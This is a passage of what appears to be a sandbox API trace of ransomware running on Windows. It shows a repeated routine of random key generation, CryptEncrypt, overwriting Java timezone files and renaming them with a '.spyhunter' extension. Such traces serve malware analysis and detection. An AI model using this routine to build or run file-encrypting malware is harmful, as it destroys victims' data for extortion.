GetProcessHeap () returned 0x2c0000 [0127.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f067d8 | out: hHeap=0x2c0000) returned 1 [0127.297] GetProcessHeap () returned 0x2c0000 [0127.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0127.297] GetProcessHeap () returned 0x2c0000 [0127.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7cc00 | out: hHeap=0x2c0000) returned 1 [0127.297] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f7e8 | out: pbBuffer=0x248f7e8) returned 1 [0127.297] GetProcessHeap () returned 0x2c0000 [0127.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0127.297] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f7e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f7e0*=0x30) returned 1 [0127.297] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Metlakatla" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\metlakatla"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0127.450] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Metlakatla") returned 62 [0127.450] StrStrW (lpFirst="Metlakatla", lpSrch=".txt") returned 0x0 [0127.450] GetProcessHeap () returned 0x2c0000 [0127.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0127.450] ReadFile (in: hFile=0x170, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f7a4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f7a4*=0x149, lpOverlapped=0x0) returned 1 [0127.451] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffffeb7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.451] WriteFile (in: hFile=0x170, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x149, lpNumberOfBytesWritten=0x248f7a4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f7a4*=0x149, lpOverlapped=0x0) returned 1 [0127.452] GetProcessHeap () returned 0x2c0000 [0127.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0127.452] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.452] WriteFile (in: hFile=0x170, lpBuffer=0x248f7e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f7a4, lpOverlapped=0x0 | out: lpBuffer=0x248f7e4*, lpNumberOfBytesWritten=0x248f7a4*=0x4, lpOverlapped=0x0) returned 1 [0127.452] WriteFile (in: hFile=0x170, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f7a4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f7a4*=0x30, lpOverlapped=0x0) returned 1 [0127.452] CloseHandle (hObject=0x170) returned 1 [0127.452] GetProcessHeap () returned 0x2c0000 [0127.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0127.452] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Metlakatla.spyhunter") returned 72 [0127.452] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Metlakatla" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\metlakatla"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Metlakatla.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\metlakatla.spyhunter")) returned 1 [0127.453] GetProcessHeap () returned 0x2c0000 [0127.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0127.453] GetProcessHeap () returned 0x2c0000 [0127.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0127.453] GetProcessHeap () returned 0x2c0000 [0127.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed4a60 | out: hHeap=0x2c0000) returned 1 [0127.455] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f7e0 | out: pbBuffer=0x248f7e0) returned 1 [0127.455] GetProcessHeap () returned 0x2c0000 [0127.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0127.455] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f7d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f7d8*=0x30) returned 1 [0127.455] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Yellowknife" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\yellowknife"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0127.476] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Yellowknife") returned 63 [0127.476] StrStrW (lpFirst="Yellowknife", lpSrch=".txt") returned 0x0 [0127.476] GetProcessHeap () returned 0x2c0000 [0127.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0127.476] ReadFile (in: hFile=0x170, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f79c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f79c*=0x42c, lpOverlapped=0x0) returned 1 [0127.500] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffffbd4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.500] WriteFile (in: hFile=0x170, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x42c, lpNumberOfBytesWritten=0x248f79c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f79c*=0x42c, lpOverlapped=0x0) returned 1 [0127.500] GetProcessHeap () returned 0x2c0000 [0127.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0127.500] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.500] WriteFile (in: hFile=0x170, lpBuffer=0x248f7dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f79c, lpOverlapped=0x0 | out: lpBuffer=0x248f7dc*, lpNumberOfBytesWritten=0x248f79c*=0x4, lpOverlapped=0x0) returned 1 [0127.501] WriteFile (in: hFile=0x170, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f79c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f79c*=0x30, lpOverlapped=0x0) returned 1 [0127.501] CloseHandle (hObject=0x170) returned 1 [0127.501] GetProcessHeap () returned 0x2c0000 [0127.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0127.501] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Yellowknife.spyhunter") returned 73 [0127.501] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Yellowknife" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\yellowknife"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Yellowknife.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\yellowknife.spyhunter")) returned 1 [0127.502] GetProcessHeap () returned 0x2c0000 [0127.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0127.502] GetProcessHeap () returned 0x2c0000 [0127.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0127.502] GetProcessHeap () returned 0x2c0000 [0127.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eba8e0 | out: hHeap=0x2c0000) returned 1 [0127.502] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f7e0 | out: pbBuffer=0x248f7e0) returned 1 [0127.502] GetProcessHeap () returned 0x2c0000 [0127.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0127.502] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f7d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f7d8*=0x30) returned 1 [0127.502] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Thule" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\thule"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0127.503] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Thule") returned 57 [0127.503] StrStrW (lpFirst="Thule", lpSrch=".txt") returned 0x0 [0127.503] GetProcessHeap () returned 0x2c0000 [0127.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0127.503] ReadFile (in: hFile=0x170, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f79c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f79c*=0x354, lpOverlapped=0x0) returned 1 [0127.659] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffffcac, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.659] WriteFile (in: hFile=0x170, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x354, lpNumberOfBytesWritten=0x248f79c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f79c*=0x354, lpOverlapped=0x0) returned 1 [0127.660] GetProcessHeap () returned 0x2c0000 [0127.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0127.660] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.660] WriteFile (in: hFile=0x170, lpBuffer=0x248f7dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f79c, lpOverlapped=0x0 | out: lpBuffer=0x248f7dc*, lpNumberOfBytesWritten=0x248f79c*=0x4, lpOverlapped=0x0) returned 1 [0127.660] WriteFile (in: hFile=0x170, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f79c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f79c*=0x30, lpOverlapped=0x0) returned 1 [0127.661] CloseHandle (hObject=0x170) returned 1 [0127.661] GetProcessHeap () returned 0x2c0000 [0127.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0127.661] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Thule.spyhunter") returned 67 [0127.661] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Thule" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\thule"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Thule.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\thule.spyhunter")) returned 1 [0127.662] GetProcessHeap () returned 0x2c0000 [0127.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0127.662] GetProcessHeap () returned 0x2c0000 [0127.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0127.662] GetProcessHeap () returned 0x2c0000 [0127.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb9880 | out: hHeap=0x2c0000) returned 1 [0127.666] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f7d8 | out: pbBuffer=0x248f7d8) returned 1 [0127.666] GetProcessHeap () returned 0x2c0000 [0127.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0127.666] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f7d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f7d0*=0x30) returned 1 [0127.666] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Yerevan" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\yerevan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0127.782] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Yerevan") returned 56 [0127.782] StrStrW (lpFirst="Yerevan", lpSrch=".txt") returned 0x0 [0127.782] GetProcessHeap () returned 0x2c0000 [0127.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0127.782] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f794, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f794*=0x235, lpOverlapped=0x0) returned 1 [0127.783] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xfffffdcb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.783] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x235, lpNumberOfBytesWritten=0x248f794, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f794*=0x235, lpOverlapped=0x0) returned 1 [0127.783] GetProcessHeap () returned 0x2c0000 [0127.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0127.783] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.783] WriteFile (in: hFile=0x17c, lpBuffer=0x248f7d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f794, lpOverlapped=0x0 | out: lpBuffer=0x248f7d4*, lpNumberOfBytesWritten=0x248f794*=0x4, lpOverlapped=0x0) returned 1 [0127.783] WriteFile (in: hFile=0x17c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f794, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f794*=0x30, lpOverlapped=0x0) returned 1 [0127.784] CloseHandle (hObject=0x17c) returned 1 [0127.784] GetProcessHeap () returned 0x2c0000 [0127.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0127.784] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Yerevan.spyhunter") returned 66 [0127.784] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Yerevan" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\yerevan"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Yerevan.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\yerevan.spyhunter")) returned 1 [0127.862] GetProcessHeap () returned 0x2c0000 [0127.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0127.862] GetProcessHeap () returned 0x2c0000 [0127.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0127.862] GetProcessHeap () returned 0x2c0000 [0127.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebd940 | out: hHeap=0x2c0000) returned 1 [0127.862] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f7d0 | out: pbBuffer=0x248f7d0) returned 1 [0127.862] GetProcessHeap () returned 0x2c0000 [0127.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0127.862] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f7c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f7c8*=0x30) returned 1 [0127.862] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-7" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-7"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0127.869] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-7") returned 53 [0127.869] StrStrW (lpFirst="GMT-7", lpSrch=".txt") returned 0x0 [0127.869] GetProcessHeap () returned 0x2c0000 [0127.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0127.870] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f78c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f78c*=0x1b, lpOverlapped=0x0) returned 1 [0127.870] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.870] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x248f78c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f78c*=0x1b, lpOverlapped=0x0) returned 1 [0127.871] GetProcessHeap () returned 0x2c0000 [0127.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0127.871] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.871] WriteFile (in: hFile=0xec, lpBuffer=0x248f7cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f78c, lpOverlapped=0x0 | out: lpBuffer=0x248f7cc*, lpNumberOfBytesWritten=0x248f78c*=0x4, lpOverlapped=0x0) returned 1 [0127.871] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f78c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f78c*=0x30, lpOverlapped=0x0) returned 1 [0127.871] CloseHandle (hObject=0xec) returned 1 [0127.871] GetProcessHeap () returned 0x2c0000 [0127.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0127.871] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-7.spyhunter") returned 63 [0127.871] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-7" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-7"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-7.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-7.spyhunter")) returned 1 [0127.872] GetProcessHeap () returned 0x2c0000 [0127.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0127.872] GetProcessHeap () returned 0x2c0000 [0127.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0127.872] GetProcessHeap () returned 0x2c0000 [0127.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec0c38 | out: hHeap=0x2c0000) returned 1 [0127.872] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f7d0 | out: pbBuffer=0x248f7d0) returned 1 [0127.872] GetProcessHeap () returned 0x2c0000 [0127.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0127.872] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f7c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f7c8*=0x30) returned 1 [0127.872] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-6" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-6"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0127.873] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-6") returned 53 [0127.873] StrStrW (lpFirst="GMT-6", lpSrch=".txt") returned 0x0 [0127.873] GetProcessHeap () returned 0x2c0000 [0127.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0127.873] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f78c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f78c*=0x1b, lpOverlapped=0x0) returned 1 [0127.874] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.874] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x248f78c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f78c*=0x1b, lpOverlapped=0x0) returned 1 [0127.874] GetProcessHeap () returned 0x2c0000 [0127.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0127.874] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.874] WriteFile (in: hFile=0xec, lpBuffer=0x248f7cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f78c, lpOverlapped=0x0 | out: lpBuffer=0x248f7cc*, lpNumberOfBytesWritten=0x248f78c*=0x4, lpOverlapped=0x0) returned 1 [0127.874] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f78c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f78c*=0x30, lpOverlapped=0x0) returned 1 [0127.874] CloseHandle (hObject=0xec) returned 1 [0127.874] GetProcessHeap () returned 0x2c0000 [0127.874] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0127.874] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-6.spyhunter") returned 63 [0127.874] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-6" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-6"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-6.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-6.spyhunter")) returned 1 [0127.875] GetProcessHeap () returned 0x2c0000 [0127.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0127.875] GetProcessHeap () returned 0x2c0000 [0127.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0127.875] GetProcessHeap () returned 0x2c0000 [0127.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec0b80 | out: hHeap=0x2c0000) returned 1 [0127.875] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f7c8 | out: pbBuffer=0x248f7c8) returned 1 [0127.875] GetProcessHeap () returned 0x2c0000 [0127.875] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0127.875] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f7c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f7c0*=0x30) returned 1 [0127.875] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-5" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-5"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0127.876] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-5") returned 53 [0127.876] StrStrW (lpFirst="GMT-5", lpSrch=".txt") returned 0x0 [0127.876] GetProcessHeap () returned 0x2c0000 [0127.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0127.876] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f784, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f784*=0x1b, lpOverlapped=0x0) returned 1 